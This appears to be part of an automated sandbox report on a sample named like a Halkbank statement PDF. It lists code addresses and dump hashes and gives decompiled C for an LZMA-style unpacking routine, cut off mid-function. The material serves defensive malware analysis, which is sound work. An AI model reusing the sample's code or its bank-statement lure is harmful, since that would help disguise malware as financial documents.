                                                      0x00407403
                                                      0x0040740e
                                                      0x00407410
                                                      0x004073e2
                                                      0x004073e2
                                                      0x004073f1
                                                      0x004073f5
                                                      0x004073f5
                                                      0x0040741a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00406d5f
                                                      0x00406d61
                                                      0x00406d64
                                                      0x00406dd5
                                                      0x00406dd8
                                                      0x00406ddb
                                                      0x00406de2
                                                      0x00406dec
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00406d66
                                                      0x00406d6a
                                                      0x00406d6d
                                                      0x00406d6f
                                                      0x00406d72
                                                      0x00406d75
                                                      0x00406d77
                                                      0x00406d7a
                                                      0x00406d7c
                                                      0x00406d81
                                                      0x00406d84
                                                      0x00406d87
                                                      0x00406d8b
                                                      0x00406d92
                                                      0x00406d95
                                                      0x00406d9c
                                                      0x00406da0
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da8
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406da2
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406d97
                                                      0x00406dac
                                                      0x00406daf
                                                      0x00406dcd
                                                      0x00406dcf
                                                      0x00000000
                                                      0x00406db1
                                                      0x00406db1
                                                      0x00406db4
                                                      0x00406db7
                                                      0x00406dba
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbc
                                                      0x00406dbf
                                                      0x00406dc2
                                                      0x00406dc4
                                                      0x00406dc5
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00406dc8
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407068
                                                      0x0040706c
                                                      0x0040708f
                                                      0x00407092
                                                      0x00407095
                                                      0x0040709f
                                                      0x0040706e
                                                      0x0040706e
                                                      0x00407071
                                                      0x00407074
                                                      0x00407077
                                                      0x00407084
                                                      0x00407087
                                                      0x00407087
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x004070ab
                                                      0x004070af
                                                      0x00000000
                                                      0x00000000
                                                      0x004070b5
                                                      0x004070b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004070bf
                                                      0x004070c1
                                                      0x004070c5
                                                      0x004070c5
                                                      0x004070c8
                                                      0x004070cc
                                                      0x00000000
                                                      0x00000000
                                                      0x0040711c
                                                      0x00407120
                                                      0x00407127
                                                      0x0040712a
                                                      0x0040712d
                                                      0x00407137
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00407122
                                                      0x00000000
                                                      0x00000000
                                                      0x00407143
                                                      0x00407147
                                                      0x0040714e
                                                      0x00407151
                                                      0x00407154
                                                      0x00407149
                                                      0x00407149
                                                      0x00407149
                                                      0x00407157
                                                      0x0040715a
                                                      0x0040715d
                                                      0x0040715d
                                                      0x00407160
                                                      0x00407163
                                                      0x00407166
                                                      0x00407166
                                                      0x00407169
                                                      0x00407170
                                                      0x00407175
                                                      0x00000000
                                                      0x00000000
                                                      0x00407203
                                                      0x00407203
                                                      0x00407207
                                                      0x004075a5
                                                      0x00000000
                                                      0x004075a5
                                                      0x0040720d
                                                      0x00407210
                                                      0x00407213
                                                      0x00407217
                                                      0x0040721a
                                                      0x00407220
                                                      0x00407222
                                                      0x00407222
                                                      0x00407222
                                                      0x00407225
                                                      0x00407228
                                                      0x00000000
                                                      0x00000000
                                                      0x00406df8
                                                      0x00406df8
                                                      0x00406dfc
                                                      0x00407569
                                                      0x00000000
                                                      0x00407569
                                                      0x00406e02
                                                      0x00406e05
                                                      0x00406e08
                                                      0x00406e0c
                                                      0x00406e0f
                                                      0x00406e15
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e17
                                                      0x00406e1a
                                                      0x00406e1d
                                                      0x00406e1d
                                                      0x00406e20
                                                      0x00406e23
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e29
                                                      0x00406e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x00406e35
                                                      0x00406e35
                                                      0x00406e39
                                                      0x00406e3c
                                                      0x00406e3f
                                                      0x00406e42
                                                      0x00406e45
                                                      0x00406e46
                                                      0x00406e49
                                                      0x00406e4b
                                                      0x00406e51
                                                      0x00406e54
                                                      0x00406e57
                                                      0x00406e5a
                                                      0x00406e5d
                                                      0x00406e60
                                                      0x00406e63
                                                      0x00406e7f
                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x00000000
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x004073cb
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x004073cb
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00000000
                                                      0x00407489
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407546
                                                      0x00407447
                                                      0x00000000
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407194
                                                      0x00407197
                                                      0x0040719a
                                                      0x0040719c
                                                      0x0040719e
                                                      0x0040719e
                                                      0x0040719f
                                                      0x004071a2
                                                      0x004071a9
                                                      0x004071ac
                                                      0x004071ba
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040749f
                                                      0x0040749f
                                                      0x004074a3
                                                      0x004075db
                                                      0x00000000
                                                      0x004075db
                                                      0x004074a9
                                                      0x004074ac
                                                      0x004074af
                                                      0x004074b3
                                                      0x004074b6
                                                      0x004074bc
                                                      0x004074be
                                                      0x004074be
                                                      0x004074be
                                                      0x004074c1
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c4
                                                      0x004074c7
                                                      0x004074c7
                                                      0x004074cb
                                                      0x0040752b
                                                      0x0040752e
                                                      0x00407533
                                                      0x00407534
                                                      0x00407536
                                                      0x00407538
                                                      0x0040753b
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x0040744d
                                                      0x00407447
                                                      0x004074cd
                                                      0x004074d3
                                                      0x004074d6
                                                      0x004074d9
                                                      0x004074dc
                                                      0x004074df
                                                      0x004074e2
                                                      0x004074e5
                                                      0x004074e8
                                                      0x004074eb
                                                      0x004074ee
                                                      0x00407507
                                                      0x0040750a
                                                      0x0040750d
                                                      0x00407510
                                                      0x00407514
                                                      0x00407516
                                                      0x00407516
                                                      0x00407517
                                                      0x0040751a
                                                      0x004074f0
                                                      0x004074f0
                                                      0x004074f8
                                                      0x004074fd
                                                      0x004074ff
                                                      0x00407502
                                                      0x00407502
                                                      0x0040751d
                                                      0x00407524
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x00407526
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000
                                                      0x004075fa
                                                      0x00407447
                                                      0x004073ce
                                                      0x004073cb
                                                      0x00000000
                                                      0x00407002

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                      • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                      • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                      • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
